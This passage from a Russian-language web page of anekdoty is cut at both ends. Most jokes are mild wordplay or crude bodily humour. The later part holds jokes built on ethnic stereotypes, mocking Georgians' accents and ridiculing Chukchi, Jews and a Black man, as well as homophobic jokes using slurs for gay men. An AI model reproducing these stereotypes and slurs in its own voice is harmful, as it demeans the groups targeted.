снимаешь?</p> <p>- Папа, а почему в газетах порой бывает юмор без слов?<br />- Ну, чтобы и неграмотные могли посмеяться.</p> <p>- Официант! Во-первых, вашу еду невозможно взять в рот, а, во-вторых, порции слишком маленькие!</p> <p>- Алло, барышня, барышня, а что вы делаете вечером? Что? А пошла ты сама, Смольный давай!</p> <p>- Официант, почему у вас такой мутный лимонад?<br />- Все в порядке, просто стакан немного грязноват.</p> <p>- Алло! Это зоопарк?<br />- Нет.<br />- А почему со мной разговаривает обезьяна?</p> <p>Гостья подходит к окну:<br />- У вас был бы чудесный вид из окна, если бы его не загораживали горы.</p> <p>Унитаз бегает из угла в угол и бормочет:<br />- Такой друг... такой друг... ТАКОЙ друг... и так в душу насрать...</p> <p>- Ты слышишь, как жасмин пахнет?<br />- Слышу, слышу, не глухая.</p> <p>- Дедушка, сколько коров вы пасете?<br />- Пять, внучек, пять. С козой шесть...</p> <p>Одна большая, полная женщина зашла в переполненный поезд и, не найдя свободного места, пошла в вагон для курящих. Там она присела на свободное место, не привлекая особенного внимания, так как окружающие мужчины были заняты курением или читали газеты. Ее сосед, пуская клубы дыма, решал кроссворд.<br />- Гм... - сказала она, оглядывая его, - какая я была глупая, предполагая, что здесь найдется хотя бы один джентльмен...<br />Сосед оторвался от кроссворда:<br />- Пардон, мадам, - пролепетал он, - не хотите ли сигару?</p> <p>- Когда я был молод, я не ленился пройти пять миль, чтобы влепить пощечину своему сопернику.<br />- А обратно ты тоже возвращался пешком?<br />- Обратно меня обычно привозили.</p> <p>Танцовщица ждет поезд на вокзале. Чтобы не терять времени даром, она сосредоточенно повторяет свою партию, выполняя все пируэты прямо на платформе. К ней подходит бабуля и заботливо шепчет:<br />- Пойдемте, я покажу вам ближайший туалет.</p> <p>- Когда мы были в Египте, - рассказывает женщина своей соседке, - мы посетили пирамиды, так вот, некоторые камни были буквально покрыты иероглифами.<br />- Что вы говорите! - воскликнула соседка. - Надеюсь, что ни один из них не напал на вас. Говорят, что некоторые из этих чужеземных насекомых просто ужасны.</p> <p>- Вот вам сапоги, которые вы заказывали для вашего новой полярной экспедиции. Надеюсь, вам понравились те, которые я сделал для вашей прошлой экспедиции?<br />- Да, очень. Это были самые вкусные сапоги, которые я когда-либо ел.</p> <p>Сопля перед зеркалом прихорашивается, челку завила, губы накрасила. <br />Нос у нее спрашивает:<br />- Ты куда собралась?<br />- На дискотеку.<br />Нос, шмыгнув:<br />- Никуда не пойдешь!</p> <p>В магазин влетает запыхавшаяся дама:<br />- Дайте мне, пожалуйста, мышеловку, а то автобус уйдет!<br />- Простите, но у нас нет мышеловок такого размера!</p> <p>- Ты не знаешь, как поживает Могенс?<br />- У него все хорошо. Упорным трудом он пробился с самого низа до верхов.<br />- А именно?<br />- Начал с чистильщика обуви, а теперь стал парикмахером.</p> <p>Идет лысый по пустыне, вдруг из-за угла его кто-то хватает за волосы и об асфальт.</p> <p>Мужик нашел подкову.<br />- Беру, - думает, - повешу дома, она мне счастье принесет! Поднимает, переворачивает на другую сторону, а там конь...</p> <p>Создали задницы всего человечества политическую партию и первым делом направили петицию в ООН со следующими претензиями:<br />1. Мы разделены на две половины.<br />2. Наш голос слышен очень редко и слабо.<br />3. Пресса до нас доходит в последнюю очередь...</p> <p>Лицо разговаривает с Задницей:<br />- Слушай, почему так, мы с тобой ровесники - а я уже старое, <br />сморщенное, а ты розовая и гладенькая?<br />- Ну, ничего удивительного. Ты видишь все безобразия, что творятся на белом свете?<br />- Ну да.<br />- А мне на все на это насрать...</p> <p>Три заядлых курильщика, перебивая друг друга, клянут пагубную привычку.<br />- И потом табак деформирует голос!<br />- Да-да, особенно меняет его тон!<br />- Совершенно верно! Вы бы послушали мою жену, когда я роняю пепел на ковер.</p> <p>Роботы на рыбалке:<br />- Тяни, клюет!<br />- Не буду, свой попался.<br />- Кто?<br />- Электрический скат.</p> <p>- Почему ты продал свой тромбон?<br />- Я случайно узнал, что мой сосед купил ружье.</p> <p>Заходит женщина в подъезд, а там мужик стоит, отливает. Женщина в испуге шарахается, сдавленно вскрикивает. Мужик:<br />- Не бойтесь, женщина! Я его держу...</p> <p>- Говорят, что полезно для здоровья ходить босиком.<br />- Да, действительно. Когда я утром просыпаюсь в ботинках, у меня ужасно болит голова.</p> <p>Двое пенсионеров наблюдают в автомастерской замену мотора. Один говорит:<br />- Было бы хорошо, если бы у людей можно было заменять мотор!<br />- Я бы был доволен заменой поршня...</p> <p>Знаменитый путешественник рассказывает о том, что он однажды попал в руки островитян.<br />- Боже! - восклицает одна из слушательниц. Ведь вы стояли одной ногой в могиле!<br />- Не в могиле, мадам, а в котле...</p> <p>Одна бабуля другой:<br />- Я и не знала, что сейчас молодежь стекла ест.<br />- С чего это ты взяла?<br />- Вчера в подъезде иду - парочка стоит, она ему говорит: &quot;Выкрути лампочку, я в рот возьму&quot;.</p> <p>Встречаются два старых приятеля:<br />- Ну, как живешь, где работаешь?<br />- Да во внутренних органах...<br />- Что, в милиции?<br />- Нет, в морге...</p> <p>Океан. Подплывает к авианосцу мужик на лодке и кричит:<br />- Эй, вы там, короче, я ставлю крышу и чтобы было все нормально, с каждого по десять долларов и без базаров!<br />- Ты что, гонишь?! Сейчас бомбами закидаем!!!<br />Мужик, крутя веслами, обиженно:<br />- Ну вот, так всегда.</p> <p>- Открой окно.<br />- Оно открыто.<br />- Ну вот, даже открыть окно нормально не можешь!</p> <p>К художнику кто-то настойчиво и долго стучит в дверь, наконец, он не выдерживает и спрашивает:<br />- Что вам нужно?<br />Из-за двери голос:<br />- У тебя кувалды нету?<br />- Не, у меня только кисточки, краски...<br />- Ну, хрен с тобой, давай кисточку!</p> <p>- Слушай, это правда, что тебе дали пощечину, а ты никак не отреагировал?<br />- И это называется &quot;не отреагировал&quot;? Хорошенькое дело, а кто же тогда упал?</p> <p>Старушка позвонила утром сыну и попросила его срочно приехать.<br />- По-моему, - сказала она, - в моем стенном шкафу сидит вор.<br />- Почему ты так думаешь?<br />- Я слышала там ночью какую-то возню.<br />- Что же ты сразу меня не вызвала?<br />- Не хотелось так поздно беспокоить тебя из-за ерунды. Я заколотила шкаф гвоздями и пошла спать.</p> <p>- Как можно отличить осторожность от трусости?<br />- Очень просто, если боимся мы, то это осторожность, а если другие - трусость.</p> <p>- Мне нужен надежный будильник.<br />- У нас есть новинка. Взгляните! Сначала включается сирена, затем раздается артиллерийский залп, и на ваше лицо выливается стакан холодной воды. Если это не помогает, будильник звонит на работу и сообщает, что вы больны гриппом!<br />- Сэр, заверните, пожалуйста!</p> <p>На скамеечке сидят две девицы в мини-юбках, мимо проходит старик и говорит:<br />- Девочки, в наше время это было принято мыть, а не проветривать!</p> <p>В каюту на пароходе влетает запыхавшаяся и растрепанная девушка.<br />- Что случилось, дорогая? - спрашивает ее соседка.<br />- Капитан сказал, что надвигается шторм, и я, как дура, позволила привязать себя к мачте!</p> <p>Звонок в российское консульство:<br />- Who are you?<br />Там отвечают:<br />- Who я? Я консул, а who you?</p> <p>Корреспондент говорит с дедом:<br />- Вы - старожил, наверное, у вас есть особые приметы, по которым вы определяете погоду?<br />- Да..<br />- A какие, если не секрет?<br />- Если я с этого места вижу противоположный берег реки, значит, будет дождь.<br />- A если не видите?<br />- Значит, дождь уже идет.</p> <p>Объявление в будапештском зоопарке: &quot;Пожалуйста, не кормите животных. Если у вас есть подходящая пища, отдайте ее дежурному сторожу&quot;.</p> <p>- Скоро лето! Ты любишь плавать?<br />- Очень!<br />- А какой способ плавания ты предпочитаешь?<br />- На спине.<br />- На чьей?</p> <p>Две дамы играют в гольф. Одна бьет по мячу и с ужасом видит, как он попадает в одного из мужчин из компании, играющей неподалеку. Мужчина хватается руками за промежность, падает и начинает со стоном кататься по земле. Дама подбежала к нему:<br />- Простите, пожалуйста, я нечаянно!<br />- Ничего, о-о-о, сейчас пройдет!<br />- Разрешите, я вам помогу!<br />- Ничего, все в порядке, о-о-о-о!<br />- Я врач, я смогу вам помочь!<br />Дама кладет мужчину на спину, расстегивает ему ширинку, запускает вовнутрь руку и начинает массировать.<br />- Ну как, лучше?<br />- О-о-о, это правда очень приятно, но мой большой палец все равно жутко болит!!!</p> <p>Встречаются два приятеля.<br />- Ты чего такой грустный?<br />- Да мои клопы объявили войну соседским.<br />- Так радуйся, они перебьют друг друга.<br />- Ага, радуйся... Они вчера привели полторы тысячи пленных.</p> <p>В толпе один господин наступил другому на ногу. Последний в сердцах крикнул:<br />- Осел!<br />- А я ветеринарный врач, чем могу быть полезен? - отвечает спокойно наступивший на ногу.</p> <p>Жили-были старик со старухой.<br />- Дед, у нас, кажется будут дети...<br />- Еще бы! Ведь завтра пенсию получаем.</p> <p>- А сейчас у меня стрижка &quot;под мальчика&quot;.<br />- Надеюсь, все остальное осталось под девочку?</p> <p>Сентиментальная леди, прогуливаясь с молодым человеком по лесу, остановилась перед деревом:<br />- Прекрасный вяз, - проговорила она, - чтобы ты сказал мне, если бы умел говорить?<br />- Наверное, он сказал бы: &quot;Прошу прощения, но я дуб&quot;, - заметил ее спутник.</p> <p>Старожил нахваливает приезжему свой город:<br />- Дома у нас красивые, высокие! Буквы рекламы по пять метров. Одна такая упадет и нет человека.<br />- На вас падала?<br />- Да, однажды.<br />- А как же вы живы остались?<br />- На меня мягкий знак упал.</p> <p>На пляже стоит фотограф с обезьянкой. К нему подходит мужчина:<br />- Сколько стоит с обезьянкой?<br />- Сфотографироваться?</p> <p>Спит мужик и видит сон, будто ему кишки осколком снаряда выпустило. Он их обратно запихивает, а они вываливаются, запихивает, а они вываливаются. Проснулся - пол-одеяла в заднице...</p> <p>На улице встречаются двое знакомых .<br />- Ты где умудрился так загореть? Весь белый, а загар коричневыми пятнами, как на корове...<br />- Да это в Сочи. Там ведь не протолкнешься.</p> <p>- Вот на этом фото мне пять лет.<br />- Извините, но в этом возрасте у вас уже была лысина?<br />- Нет, вы держите фотографию вверх ногами!!!</p> <p>Приходит глухая старушка в магазин и спрашивает:<br />- В какую цену трусы?<br />- Это не трусы, это панталоны.<br />- Надо же, трусы и те по талонам.</p> <p>Мужик выиграл в Спортлото кучу денег. Друзья пристают:<br />- Ни фига себе! Как это ты умудрился - в Спортлото и выиграть?<br />- Да понимаете... Мне сон приснился. Шесть семерок. Ну, я поставил на сорок девять - и выиграл!<br />- Не врубился... Шестью семь - сорок два...<br />- Ну и ходи босой со своей математикой!</p> <p>Космонавт сообщает в Центр:<br />- В двух километрах от корабля за иллюминатором появилось огромное синее чудовище с антенной на голове.<br />Оно непрерывно смотрит на меня и держит в руках фотоаппарат. Что делать?<br />- Сейчас решим, а пока улыбайтесь ему!</p> <p>Стоит мужик, у него из ушей торчат бананы. Подходит другой:<br />- Мужик, у тебя в ушах бананы!<br />- Ничего не слышу, у меня в ушах бананы!</p> <p>Колхоз. Спрашивают председателя. Секретарь говорит:<br />- Нет его, сеет.<br />- Да какой сев, декабрь на дворе.<br />- А, да я букву &quot;Р&quot; не выговаиваю.</p> <p>Мужик берет в баре две кружки пива и идет в туалет. Возвращается с пустыми. Так происходит четыре раза. Бармен проследил за мужиком: видит - он пиво в унитаз выливает. Бармен:<br />- Вам что, не нравится пиво?<br />- Пиво-то хорошее, но мне так надоело быть посредником!</p> <p>Приходит мужик в зоомагазин и говорит продавцу:<br />- Слышь, мужик, мне надо две тысячи тараканов.<br />- Э-э-э... Простите, но у меня нет данных насекомых!<br />- Ч-черт! - вырвалось у мужика.<br />- Простите, а зачем вам такое количество тараканов?<br />- Да я вот квартиру снимал, а в договоре написано, что в каком виде принял жилье, в таком должен и освободить.</p> <p>Москвич заводит разговор с гостем столицы:<br />- Простите, вы не местный?<br />- Да, а как вы догадались? Я, - оглядывает себя, - как-то не так одет?<br />- Да нет, просто, смотрю - лицо незнакомое...</p> <p>Звонок по тел.<br />- Это контора &quot;Френкель, Френкель, Френкель и Френкель&quot;?<br />- Да.<br />- Будьте добры барона Френкеля.<br />- Его нет, он на совещании в Париже.<br />- Тогда господина Френкеля.<br />- Его тоже нет. Он в Одессе, отдыхает...<br />- Тогда мистера Френкеля.<br />- Его нет.<br />- Тогда Френкеля.<br />- У телефона.</p> <p>Пришел мужик в гости в деревне. Пока хозяин ходил за бутылкой, тот взял, проткнул сырые яйца, выпил их и обратно на тарелку положил. Пришел хозяин, выпили, хозяин взял яйцо - оно пустое, второе - тоже, третье - тоже. Он схватил топор и давай курам головы рубить:<br />- Я вам покажу, как без спроса аборты делать!!!</p> <p>- В этом древнем монастыре немало разных интересных реликвий. Но особо обращаю ваше внимание вот на эту амфору.<br />- А чем она замечательна?<br />- В ней содержится египетская тьма, вывезенная прямо из Александрии.</p> <p>Мужик приходит в аптеку, покупает большую пачку презервативов, бросает ее на пол и с большим ожесточением начинает ее топтать. Его спрашивают:<br />- Мужик, зачем ты это делаешь?<br />- Вот так неделю назад я бросил курить.</p> <p>Звонок в дверь. Из квартиры голос:<br />- Кто там?<br />Снаружи отвечают:<br />- А кто там?</p> <p>Молодой человек спрашивает в книжном магазине:<br />- У вас есть книга &quot;Как стать миллионером за 7 дней&quot;?<br />- Пожалуйста, только вместе с ней очень рекомендую приобрести Уголовный кодекс...</p> <p>Мужчина, держащий на руках два арбуза заходит в общественный туалет и обращается к одному из справляющих нужду.<br />- Уважаемый, не поможете ли вы мне с ...<br />- Конечно, помогу - и расстегивает ему ширинку.<br />- А теперь обратно, пожалуйста. Вот и хорошо. Слушай, ты не подержишь арбузы, пока я руки помою.</p> <p>Замучила мужика жизнь - с работы уволили, жена ушла, денег нет, короче, спивается помаленьку и встречает как-то своего преуспевающего одноклассника, и берет он его на работу. В первый рабочий день мужику говорят:<br />- На тебе чек, перейди через дорогу в банк и получи $40.000.<br />Тот приносит $40.000, друг отсчитывает ему из них $20.000:<br />- На, - говорит, - за сервис.<br />И так каждый&#160; день. Мужик&#160; купил машину квартиру, подниматься начал, а сам день ото дня все смурнее и смурнее. Его друзья и спрашивают, что, дескать, такой грустный? Он и говорит:<br />- Понимаете, в банк я хожу один, а делим-то мы на двоих.</p> <p>Через полчаса после того, как скорый поезд отъехал от станции, в последний вагон на ходу забирается юноша с двумя чемоданами и, пройдя в вагон, опускается на первое попавшееся свободное место. Сил идти дальше нет. Старик, наблюдавший за ним, говорит с чувством превосходства:<br />- Эх, молодежь нынче пошла хилая! Вот, бывало, отстанешь от поезда, пробежишься за ним, догонишь - и ничего - силы еще оставались!<br />- Вы не так поняли, - отвечает юноша, - я отстал от поезда еще вчера!</p> <p>В дом одинокой бабки провели радио. Утром, в шесть часов, оно впервые заговорило:<br />- Доброе утро!<br />Бабка соскочила с постели:<br />- Доброго здоровья! Куда это вы так рано?</p> <p>Две сестры были очень близки, это позволяло им быть искренними друг с другом. Однажды вечером, собираясь на свидание, младшая вертелась перед зеркалом:<br />- Какая же я толстая!<br />- Вовсе нет, - проворчала старшая, отрываясь от конспекта.<br />- У меня ужасные волосы.<br />- Они чудесные!<br />- Я еще никогда не выглядела так плохо, - захныкала младшая.<br />- Нет, выглядела!</p> <p>Остановился мужик в отеле. Вечером просит служанку:<br />- А на ночь принесите мне два стакана - один с водой, а другой без.<br />- А почему, извините, именно так?<br />- Ну, стакан с водой - на случай, если я пить захочу.<br />- Это понятно, а пустой-то зачем?<br />- А это если не захочу...</p> <p>Пришел клиент к часовщику. Тот развинтил его часы, а из них выпал дохлый таракан. Мастер говорит:<br />- Тю, браток, так у тебя же машинист помер</p> <p>На оперативке директор чаеразвесочной фабрики спрашивает у начальника отдела сбыта:<br />- Чай в Москву отправили?<br />- Да, &quot;Бодрость&quot;.<br />- А в Минск?<br />- Да, &quot;Экстру&quot;.<br />- А в Бишкек?<br />- Нет, еще не отправили.<br />- Почему?<br />- Не успели полы подмести!</p> <p>Приходит мужик в банк, подходит к операционисту:<br />- Идиот, выпиши мне чековую книжку.<br />Операционист обиделся и пошел к менеджеру, мол, клиент оскорбляет. Менеджер спрашивает, а какой у него остаток на счету.<br />- Два миллиона долларов.<br />- Идиот! Выпиши ему чековую книжку!</p> <p>Встретились бледный и грустный.<br />- Ты чего такой грустный?<br />- Да что-то взгрустнулось... А ты что такой бледный?<br />- Взбледнулось...</p> <p>- Помнишь, ты на прошлой неделе рассказывал, что нашел кошелек с деньгами.<br />- Помню. Ну и что?<br />- Так я вчера тоже кошелек нашел.<br />- Ну и что?<br />- Так я же тебе говорил, что везет не только дуракам.</p> <p>Двое знакомых сидят в кафе.<br />- Жизнь похожа на чашку чая, - задумчиво произносит один из них.<br />- Почему? - удивляется второй.<br />- Откуда мне знать? Я что, философ?</p> <p>Осень. Глубинка. Грязи по колено. Мерзкий мелкий дождичек. По грязи продирается грязный же, заросший, в рваной телогрейке мужик. В одном сапоге. И блаженно улыбается. Ему навстречу другой:<br />- Мужик, ты откуда упал? Погляди вокруг - осень, холодно, грязь, дождь этот мерзкий... Погляди на себя - грязный, небритый, ватник драный, сапог где-<br />то потерял...<br />- (с блаженной такой интонацией) Да не потерял - нашел!</p> <p>В трамвае парень втискивается на сиденье и говорит сидящему рядом старику:<br />- Ну ты, жопа, подвинься!<br />- А откуда вы знаете мою старую партийную кличку?</p> <p>Мужик подходит к остановке. Народу, как водится, пропасть. Встал, задумался о своем, достает из носа соплю и давай шарик катать. Подходит к нему другой мужик, а в руках шар с полметра диаметром:<br />- Что, мужик, только подошел?</p> <p>Мужик вышел к ручью умыться и попить водички. Наклонился к воде и вдруг слышит шорох в кустах вверх по течению. Он крикнул:<br />- Эй, там никто не писает?<br />В ответ, сдавленно:<br />- Нн-е-е-ее-е!</p> <p>Заходит мужик в общественный туалет отлить, а на соседнем посадочном месте сидит старичок. В процессе отлития мужик замечает, что старичок нервно подергивает головой и плечами. Мужик спрашивает:<br />- Что, дед, ветеран?<br />- Ветеран!<br />- Второй Белорусский?<br />- Второй Белорусский! (продолжая дёргаться).<br />- Что, дед, контузия?<br />- Нет! (удивлённо, не прекращая нервных подёргиваний).<br />- А чего дергаешься?<br />- А что ж ты, сука, брызгаешься!!!</p> <p>Репортер, ранее не бывавший в богатых домах, приходит к миллионеру брать интервью. В дверях его встречает дворецкий.<br />- Ваш плащ, сэр.<br />- Да, мой. У меня и чек на него есть.</p> <p>Два мужика выходят из кабака.<br />- Эх, звездей-то на небе сколько!<br />- Не звездей, а звездов.<br />- Эй, мужик, как правильно, звездей или звездов?<br />- Да вы что, мужики, я и словей-то таких не знаю.</p> <p>Бензиновая колонка в африканской пустыне. Большая вывеска: &quot;Наполни бак и все канистры. Три следующие бензоколонки, которые ты увидишь, - мираж&quot;.</p> <p>Пожилой мужчина нес на плечах в мастерскую большие старинные часы. Нечаянно задел ими проходящую женщину. Собирая вещи, которые у нее рассыпались, она кричит:<br />- А вы не могли бы, как все нормальные люди, носить часы на руке?</p> <p>Человек с одними часами знает, сколько времени.<br />Человек с двумя часами никогда не уверен, который час.<br />Человек с тремя часами - дурак.<br />Человек с четырьмя часами - вор.<br />Человек с пятью часами - швейцарец.<br />Человек с шестью часами точно не пройдет детектор металла в аэропорту.<br />Человек с семью часами точно держит лавочку.<br />Человеку с восемью часами нужно хобби.<br />Человек с девятью часами всегда опоздает.<br />Человек с десятью часами - это хохма.</p> <p>Мужик похвастался, что с закрытыми глазами сорт колбасы определяет. Ну и решили его проверить: завязали глаза и суют в рот кусок колбасы.<br />- Докторская.<br />- Оо!<br />- Любительская.<br />- Правильно!<br />Ну и решили подшутить над ним, подсунуть женскую грудь:<br />- Краковская...<br />- Ха-ха-ха!<br />-...дом 23, квартира 11.</p> <p>- Дедушка, что ты делаешь с этой бутылкой? Ты хочешь установить в ней кораблик?<br />- Именно это я сначала и хотел. А теперь рад бы просто вытащить оттуда руку.</p> <p>- Слушай, за локон твоей сестры я дам тебе 15 франков.<br />- Давай 30, и я тебе принесу весь парик.</p> <p>К туалету подбегает мужчина, лихорадочно стучит в закрытую дверь. Оттуда говорят:<br />- Подождите, у меня запор!<br />- Счастливец!</p> <p>Иностранец забыл слово &quot;пять&quot;, подходит к продавцу и говорит:<br />- Мне шесть булочек, а одну не надо.</p> <p>Девушка разговаривает из телефона-автомата:<br />- Представляешь, я сегодня купила новую шляпку. Такую элегантную, что четверо мужчин не перестают ей<br />восхищаться уже полчаса, пока я разговариваю с тобой.</p> <p>- Чему вы так радуетесь? - спросила женщина у 98-летнего старика.<br />- Я разбил зеркало, - ответил он.<br />- Но это значит, что вас целых семь лет будут преследовать неудачи!<br />- Я знаю, - радостно отозвался он, - разве это не замечательно?</p> <p>Одну прабабушку спросили, как она почувствовала себя, когда у нее появился первый правнук.<br />- Это было чудесно, - ответила она. - Но до тех пор, пока я не поняла, что стала матерью деда!</p> <p>Идет человек. Видит посреди площади стоит какой-то агрегат, на нем надпись: &quot;Хорошее настроение - 20 рублей, плохое - 10&quot;, конечно интересно ему стало. Порылся в карманах, нашел 10 рублей, ну, думает, надо проверить... Плюх! Этак с ведро. Прохожие вокруг стоят, хохочут, настроение непередаваемое. Порылся еще в карманах,<br />нашел 20 рублей... Плюх, плюх, плюх... по прохожим...</p> <p>Двое заходят в музей и долго осматривают мумию, на которой написано &quot;1075 г.н.э.&quot;.<br />- Интересно, что обозначает эта табличка?<br />- Скорее всего, номер машины, который сбил этого пешехода.</p> <p>Ночь. Мужик спит. Вдруг начинает беспокойно дергаться, просыпается, вскакивает, бежит отливать. Отлив,<br />блаженно улыбается и говорит с укоризной, глядя на член:<br />- Вот когда ТЕБЕ надо, я ВСЕГДА встаю!</p> <p>Ссорятся два лысых человека:<br />- А ты лысее меня!<br />- Но почему? Ни у тебя, ни у меня на голове ни единого волоса!<br />- Но у тебя голова больше моей!</p> <p>Старушка приходит в банк, выписывает чек. Клерк ей говорит:<br />- А теперь подпишитесь.<br />- А как?<br />- А как вы письма, открытки подписываете?<br />Старушка аккуратно выводит: &quot;Целую вас всех, ваша тетя Эмилия&quot;.</p> <p>Девушка в ванной моется. Неожиданно заходит водопроводчик. Девушка:<br />- Ах! - и мочалками прикрылась.<br />Водопроводчик:<br />- Ты чего? Ни разу водопроводчика не видела?</p> <p>Пассажир, купив билет на поезд, пересчитал пять раз сдачу.<br />- Ну что, все правильно? - спросила выведенная из терпения кассирша.<br />- Да уж до того правильно, что даже ни копейки лишней!</p> <p>Две пожилые женщины встретились после долгой разлуки. Одна говорит:<br />- Какие мы были красивые некогда, особенно я...<br />Вторая отвечает:<br />- А теперь мы так плохо выглядим, особенно ты...</p> <p>- Дайте мне медаль &quot;Герой Советского Союза&quot;.<br />- За что?<br />- Я на четвереньках из Питера до Москвы полз.<br />- Ну и что?<br />- Так Мересьеву дали...<br />- Так то война...<br />- Тогда дайте 50 рублей.<br />- Зачем?<br />- Брату телеграмму послать, он из Смоленска ползет...</p> <p>Вокзал. Зал ожиданий. Все места заняты, в самом углу на двух креслах сидит огромный негр, кемарит. Заходит бомж, окидывает взглядом зал и направляется к негру.<br />- Слышь, цыган, подвинься...<br />- Я не цыган, я негр!<br />Бомж с удивлением:<br />- Ну, я не знаю, какие у вас там цыгане...</p> <p>По аэропорту ходит грузин в ожидании своего рейса. Заходит в зал игральных автоматов. Подходит к дисплею и читает:<br />&quot;Hазывает национальность, возраст и каким рейсом улетает.&quot;<br />Грузин монетку бросил, читает:<br />&quot;Грузин, 27 лет, улетает рейсом 700.&quot;<br />Изумленный грузин выходит. Переодевается в шикарную даму, вновь подходит к автомату, бросает монетку, читает:<br />&quot;Грузин, 27 лет, улетает рейсом 700.&quot;<br />Тогда он переодевается в сарика. Узнать невозможно. Еще раз<br />бросает монетку в автомат, читает:<br />&quot;Грузин, 27 лет, если бы дурью не маялся, то улетел бы рейсом 700.&quot;</p> <p>В гpузинской школе.<br />- Кыко, чьто такоэ Бэгэмот?<br />- Это такой сумасшэдший pиб!<br />- А почему жэ он жьивет на суше?<br />- Я жэ сказаль сумасшэдший!</p> <p>В Сочи возле ресторана стояла хорошо одетая, красивая, роскошная дама. Грузин решил с ней познакомиться. Подошел с левой стороныи говорит:<br />- Барышня, какая сегодня хорошая погода!<br />Hо барышня&#160; молчит и не смотрит на него.&#160; Тогда грузин зашел с правой стороны и говорит:<br />- А вчера какая была плохая погода, шел дождь...<br />Hо дама по-прежнему молчит. Тогда грузин зашел спереди:<br />- А вчера какая была плохая погода, шел дождь...<br />Hо дама по-прежнему молчит. Тогда грузин зашел спереди:<br />- А как ты думаешь, какая погода будет завтра?<br />- Отстань от меня! Я проститутка, а не синоптик...</p> <p>Грузин пишет письмо домой:<br />- Мама,&#160; я учусь в институте. Все ездят на занятия в автобусе, один я - в такси.<br />Мать пишет сыну ответ:<br />- Сынок, зачем выделяться? Купи автобус и езди, как все.</p> <p>В грузинской школе идет родительское собрание.<br />- Чеквадзе,&#160; Ваша дочь - умница, отличница, активистка. Сухошвили, Ваш сын учиться хорошо,&#160; но стал курить. А Вашего сына, Гогоберидзе, не было вчера, позавчера и сегодня.<br />- И не будет!<br />- Почему?<br />- Зарэзал гада!!!</p> <p>Грузин продает на базаре рыбу. Подходит покупатель:<br />- Кефаль?<br />- Форэл.<br />- Свежая?<br />- Живая.<br />- А почему не шевелиться?<br />- Спыт...<br />- А почему пахнет?<br />- Слушай,&#160; дорогой, ты когда спыш - за свои действия отвечаеш, да?</p> <p>Грузин жалуется:<br />- Hе приняли, понимаеш, картину в Третьяковскую галерею.<br />- А что на ней нарисовано?<br />- Горы нарисованы,&#160; река нарисована, молодая женщина на берегу сыдит, ребенка грудью кормит. Hе приняли,<br />понимаеш, в Третьяковскую галлерею: ребенку, говорят, 22 года.</p> <p>Два гpузина встpечаются. Один говоpит:<br />- Куплу сэбэ бэлый бpуки, бэлый pубашка, бэлый пиджак, бэлый туфлы, бэлый наски!..<br />- И зелоную кэпку - будишь, как бутылка кефиpа!</p> <p>Сидят два гpузина. Один говоpит:<br />- Сюшай Вано, я Экстpасенсам стал.<br />- Гоги, нэ абманывай. Дакажи!<br />- Хочешь, шас Сандpо, почтенный челавек вийдет на балкон голий и на гаpмошке сигpает.<br />- Гоги, пакажи, а то заpежю, если абманывашь.<br />Гоги нахмуpился, pуки к вискам пpиставил. Тpижды хмуpил лоб Гоги, вдpуг откpывается двеpь на балкон, выходит Сандpо голый и говоpит споpящим.<br />- Hу нэт у мене гаpмошкы дома, нэт!</p> <p>- Покажите мне пожалуйста самые большие трусы. Так Отлично.<br />Вот телефон. Когда придут покупать - пусть позвонят.</p> <p>Южный человек с девушкой долго молча едут в купе поезда.<br />- Дэвушка, - не выдерживает тот. - Ты пачему молчиш?<br />- Хочу и молчу! - отвечает та.<br />- Хочэт и малчыт! - всплескивает руками мужчина.</p> <p>Грузин молится. Просит&#160; у бога, чтобы&#160; он ему послал&#160; машину, много денег, молодую&#160; красивую любовницу.&#160; А рядом&#160; оборванный русак&#160; усиленно просит, чтобы всевышний послал ему бутылку водки.<br />- Слушай,&#160; - не&#160; выдержал грузин,&#160; - не&#160; отвлекай всевышнего такими мелочами, - на тебе на две и убирайся.</p> <p>Идет служба в церкви, все чинненько стоят, молитвы распевают.&#160; Свечки горят, поп опять же ходит - кадилом машет. Тут откуда ни возьмись&#160; голубой к нему:<br />- Мужчинка, мужчинка! А супчик у Вас уже закипел!</p> <p>Два педика лежат в постели. Один-дpугому: &quot;Ты зачем мне на х#@ насpал?&quot;<br />Тот: &quot;Да ты что, мы пpосто кончили одновpеменно!&quot;</p> <p>Звонок в квартиру:<br />- Скажите, здесь гомосексуалисты живут?<br />- Не знаю, сейчас у жены спрошу: Федя, у нас гомосексуалисты живут?</p> <p>- Тов. cтаршина, у наc в роте голубые появилиcь..<br />- А ты откуда знаешь?<br />- У меня косметичку укpали</p> <p>Сеpжант - pядовому:<br />- Еще pаз губы накpасишь - в&quot;#бу!<br />- Товаpищ сеpжант, вы вот все обещаете, а не выполняете</p> <p>Ссоpятся два голyбых:<br />- Ты, козел!!<br />- Да ты сам козел!!!<br />- Ты, дyбье!!<br />- Да сам дyбье!!!<br />- Да пошел ты в ж....<br />- Что, мы yже миpимся???</p> <p>А для всех прочих - другой:<br />Цирк. Смертельный номер: дрессировщица вкладывает огромному льву голову в пасть.<br />После этого конферансье обьявляет:<br /> - Кто повторит этот номер, получит 10 тысяч рублей.<br />С галерки доносится голос Рабиновича:<br /> - Я повторю! Только уберите хищника.</p> <p>Телеграммы&#160; из-за&#160; рубежа&#160; очень&#160; дорогие&#160; &#160;стали,&#160; &#160;поэтому&#160; &#160;бывшие<br />сограждане присылают из Америки коротку телеграммы по поводу смерти:<br />&quot;Абрам все&quot;<br />Ответ: &quot;Ой&quot;</p> <p>Лежит мужик на чукчанке и вдруг, скрип полозьев подъезжающих нарт...<br />- Слезай скорей, муж приехал, убьет однако!<br />- А я читал, что у чукчей муж под гостя сам жену кладет?<br />- Ай как жалко однако! Совсем неграмотная у меня мужик, книжек не читает!</p> <p>Решил чукча курами обзавестись. Купил десяток щипаных куp в гастрономе, вспорол свой китайский пуховик и стал в тушки (AKA трупики) птиц втыкать пёрышки и пух. Входит жена и спрашивает:<br />- Однако, что ты творишь?<br />- Кур.<br />- Ды ты Бог, однако.</p> <p>Чукча попал каким-то образом в Москву в 20-х годах, города не знает, вообще ничего не понимает, забрел случайно на вокзал и стал на путях. Вдруг на него зверя бежит однако очень большая, свистит, пыхтит, дым пускает, черная такая зверя - однако чукчу сбило паровозом, он так и не понял, что с ним произошло. Вылечили чукчу - уехал он к себе на Чукотку, заходит в чум - а там чайник на костре со свистком - жена на фактории на шкурки обменяла. Чукча хватает топор - хрясь по чайнику! - тот пополам.<br />- Ты чего, - жена спросила. - Однако новая вещь!<br />- Я понял - этих зверей нужно убивать пока они маленькие.</p> <p>Сидит чукча на берегу реки и поет: &quot;миллион алых роз, красный, желтый, зеленый&quot;. Тут геологи на вездеходе подъехали и спрашивают: <br />- 